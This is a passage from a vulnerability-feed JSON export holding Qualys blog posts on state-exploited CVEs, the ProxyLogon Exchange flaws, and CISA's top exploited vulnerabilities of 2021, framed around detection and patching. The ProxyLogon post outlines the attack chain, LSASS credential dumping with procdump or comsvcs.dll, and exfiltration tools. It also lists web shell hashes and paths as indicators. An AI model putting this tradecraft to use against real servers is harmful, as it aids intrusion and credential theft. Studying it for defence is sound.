"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the Chinese government\u2014officially known as the People\u2019s Republic of China (PRC) states-sponsored cyber actors' activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People's Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC malicious actor continues to exploit known vulnerabilities to target U.S. and vigorously allied networks and software and hardware companies to rob intellectual property and develop access to sensitive networks. \n\nThey stated that PRC state-sponsored cyber activities as one of the most significant and dynamic threats to U.S. government and civilian networks. The PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to Information Technology Sector, telecommunications organizations, Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor**| **CVE**| **Vulnerability Type**| Qualys **QID**(s) \n---|---|---|--- \n| | | \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. Multiple CVEs indicated in Table 1 let the actors stealthily acquire unauthorized access into sensitive networks, after which they pursue to develop persistence and reposition laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised significant telecom establishments and network service providers mostly by exploiting publicly known vulnerabilities. Networks affected have varied from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. The devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as means to conduct network intrusions on other entities. Furthermore, cyber defenders often overlook these devices, who work to maintain and keep pace with frequent software patching of Internet-facing services and endpoint devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n\n\nUsing, [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using the [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability. \n\n\n\nUsing the Qualys Unified Dashboard, you can track, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored threat cyber actors. \n\nHere is a summary of mitigations guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, as listed in this article and the list provided by [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Utilize phishing-resistant multi-factor authentication and require all accounts with a unique and strong password. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest methods that organizations of all sizes could stay on top of these vulnerabilities and end-of-life (EOL) network/device infrastructure as noted by NSA general mitigations guidelines is to catalog the infected assets and apply patches as soon as possible. This could be an effortless process if the corps utilize the power of Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting, and patching the high-priority commonly exploited vulnerabilities. \n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-11T20:27:44", "description": "**Update March 10, 2021**: A new section describes how to respond with mitigation controls if patches cannot be applied, as recommended by Microsoft. This section details the Qualys Policy Compliance control ids for each vulnerability.\n\n**Update March 8, 2021**: Qualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. QID 50108 is available in VULNSIGS-2.5.125-3 version and above, and is available across all platforms as of March 8th, 1:38 AM ET. This QID is not applicable to agents, so the signature version for the agent will not be updated. QID: 50107, released in VULNSIGS-2.5.121-4 and Windows Cloud Agent manifest 2.5.121.4-3 and above, will accurately detect this vulnerability via agents.\n\n**Original Post**: On March 2nd, [Microsoft released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) a set of out-of-band security updates to address critical remote code execution vulnerabilities in Microsoft Exchange Server. According to Microsoft these vulnerabilities are actively being exploited in the wild, and hence it is recommended to patch them immediately.\n\nTo detect vulnerable instances, Qualys released QID 50107 which detects all vulnerable instances of Exchange server. This QID is included in VULNSIGS-2.5.121-4 version and above.\n\nCVEs addressed as part of this QID are: CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\nAmong the above CVEs, [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) are being actively targeted in the wild using zero-day exploits. Microsoft attributes these attacks with high confidence to the HAFNIUM (Chinese cyber spy) threat actor group. These vulnerabilities are related to the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\nAt the time of the security update release the vulnerabilities affect only on-premises Microsoft Exchange Server installations. Exchange online is not affected.\n\n### CVE Technical Details\n\n**[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)** is a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to send arbitrary HTTP requests and authenticate to on-premises Exchange servers. Attackers can also trick the Exchange server to execute arbitrary commands by exploiting this vulnerability.\n\n**[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Attackers who successfully exploit this vulnerability can run their code as SYSTEM on the Exchange server. \n\n**[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>)** is a post-authentication arbitrary file write vulnerability in Exchange. Exploiting this vulnerability could allow an attacker to write a file to any part of the target Exchange server. Attackers exploiting this vulnerability could write a file to any path on the target Exchange server.\n\n**[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)** is a post-authentication arbitrary file write vulnerability in Exchange. Similar to CVE-2021-26858, exploiting this vulnerability could allow an attacker to write a file to any path of the target Exchange server.\n\n### Attack Chain\n\nMicrosoft has provided details regarding how the HAFNIUM (threat actor) group is exploiting the above-mentioned critical CVEs. Following sequence of steps summarizes Microsoft\u2019s findings.\n\n 1. The initial step in the attack chain includes the threat actor group making an untrusted connection to the target Exchange server (on port 443) using CVE-2021-26855.\n 2. After successfully establishing the connection, the threat actor group exploits CVE-2021-26857 that gives them ability to run code as SYSTEM on the target Exchange server. This requires administrator permission or another vulnerability to exploit.\n 3. As part of their post-authentication actions, the threat actor group exploits [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) and proceeds to writing files to any path of the target server.\n\nIt has been observed that after gaining the initial access, the threat actor group deployed web shells on the target compromised server.\n\nFollowing table shows the MITRE ATT&CK Technique and Tactic details.\n\n**Tactic**| **Technique**| **Sub-Technique**| **TID** \n---|---|---|--- \nReconnaissance| Gather Victim Identity Information| Email Addresses| T1589.002 \nReconnaissance| Gather Victim Identity Information| IP Addresses| T1589.005 \nResource Development| Develop Capabilities| Exploits| T1587.004 \nInitial Access| Exploit Public-Facing Application| -| T1190 \nExecution| Command and scripting interpreter| PowerShell| T1059.001 \nPersistence| Create Account| Domain Account| T1136.002 \nPersistence| Server Software Component| Web Shell| T1505.003 \nCredential Access| OS Credential Dumping| LSASS Memory| T1003.001 \nCredential Access| OS Credential Dumping| NTDS| T1003.003 \nLateral Movement| Remote Services| SMB/Windows Admin Shares| T1201.002 \nCollection| Archive Collected Data| Archive via Utility| T1560.001 \nCollection| Email Collection| Remote Email Collection| T1114.002 \nCollection| Email Collection| Local Email Collection| T114.001 \nCommand and Control| Remote Access Software| -| T1219 \nExfiltration| Exfiltration over Web Service| Exfiltration to Cloud Storage| T1567.002 \n \n### Discover and Remediate the Zero-Day Vulnerabilities Using Qualys VMDR\n\n##### Identify Microsoft Exchange Server Assets\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange server systems.\n\nQuery: _operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cExchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the 0-days as well as any new Windows Exchange server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n##### Discover Exchange Server Zero-Day Vulnerabilities\n\nNow that hosts running Microsoft Exchange Server are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like these based on the always updated KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\nVMDR query: `vulnerabilities.vulnerability.qid:50107`\n\n\n\nQID 50107 is available in signature version VULNSIGS-2.5.121-4 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.121.4-3 and above.\n\nQualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. This QID is not applicable to agents. QID 50108 is available in VULNSIGS-2.5.125-3 version and above.\n\nOrganizations that use on-premises Exchange installations typically also enable Outlook Web Access (OWA), which is exposed to the internet to allow users to connect into their e-mail systems. It is therefore recommended organizations employ both remote and authenticated scanning methods to get the most accurate view of vulnerable assets, as using only the agent-based approach would not provide a comprehensive picture of the vulnerability exposure.\n\nWith VMDR Dashboard, you can track 'Exchange 0-day', impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Dashboard**: [Exchange Server 0-Day Dashboard | Critical Global View](<https://qualys-secure.force.com/customer/s/article/000006564>)\n\n\n\n##### Respond by Patching\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 50107\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Exchange Server 0-day.\n\n\n\nSecurity updates are available for the following specific versions of Exchange:\n\n * [Update for Exchange Server 2019](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires Cumulative Update (CU) 8 or CU 7\n * [Update for Exchange Server 2016](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 19 or CU 18\n * [Update for Exchange Server 2013](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 23\n * [Update for Exchange Server 2010](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459>): Requires SP 3 or any SP 3 RU\n * This is a defense-in-depth update.\n\nUsers are encouraged to apply patches as soon as possible.\n\n##### Respond with Mitigation Controls if Patches Cannot Be Applied\n\nWe recognize not all organizations may be able patch their systems right away. In such scenarios Microsoft has recommended a few [interim mitigation controls](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) to limit the exploitation of these vulnerabilities. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) has added controls based on these recommendations for impacted Exchange Servers 2013, 2016, and 2019. The vulnerability details and corresponding Control IDs (CIDs) are provided below.\n\n**CVE-2021-26855**: This mitigation will filter https requests that contain malicious X-AnonResource-Backend and malformed X-BEResource cookies which were found to be used in the SSRF attacks in the wild. This will help with defense against the known patterns observed but not the SSRF as a whole.\n\n * **CID 20831** - Status of match URL of rewrite rule 'X-BEResource Abort - inbound' for which action is 'AbortRequest at site level\n * **CID 20834** - Status of match URL of rewrite rule 'X-AnonResource-Backend Abort - inbound' for which action is 'AbortRequest at site level\n\n**CVE-2021-26857**: Disabling the UM Service will mitigate this vulnerability.\n\n * **CID 20829** - Status of 'component' installed on the MS Exchange server\n * **CID 20828** - Status of Microsoft Exchange Unified Messaging Call Router service\n * **CID 20827** - Status of Microsoft Exchange Unified Messaging service\n\n**CVE-2021-27065**: Disabling OAB Application Pool will prevent this CVE from executing successfully as the API will no longer respond and return a 503 when calling OAB, which will mitigate the Arbitrary Write exploit that occurs with OAB. After stopping the WebApp Pool you will also need to set the OabProxy Server Component state to Inactive.\n\n * **CID 20832** - Check the 'startMode' of the OAB Application Pool (MSExchangeOABAppPool)\n\n**CVE-2021-26858**: Disabling ECP Virtual Directory will prevent CVE-2021-27065 from executing successfully as the API will no longer respond and return a 503 when calling the Exchange Control Panel (ECP).\n\n * **CID 20833** - Check the 'startMode' of the ECP Application Pool (MSExchangeECPAppPool)\n\nQualys Policy Compliance can be used to easily monitor these mitigating controls for impacted Exchange assets.\n\n\n\nDrill down into failing controls to view details and identify issues.\n\n\n\n### Post-Compromise Detection Details\n\nAfter compromising a system, an adversary can perform the following activity:\n\nUse legitimate utilities such as procdump or the rundll32 comsvcs.dll method to dump the LSASS process memory. Presumably, this follows exploitation via CVE-2021-26857 as these methods do need administrative privileges.\n\n\n\nUse 7-Zip or WinRar to compress files for exfiltration.\n\n\n\nUse PowerShell based remote administration tools such as Nishang & PowerCat to exfiltrate this data.\n\n\n\nTo maintain persistent access on compromised systems, adversaries may also create a domain user account and install ASPX- and PHP-based web shells for command and control. Information about their probable location and their related hashes are mentioned below.\n\n**Web shell hashes**:\n \n \n b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n**Web shell paths**:\n\n`C:\\inetpub\\wwwroot\\aspnet_client\\ \nC:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V14\\FrontEnd\\HttpProxy\\owa\\auth\\ \nC:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\`\n\n### References\n\n * https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901\n * https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss3": {}, "published": "2021-03-03T22:12:19", "type": "qualysblog", "title": "Microsoft Exchange Server Zero-Days (ProxyLogon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T22:12:19", "id": "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using 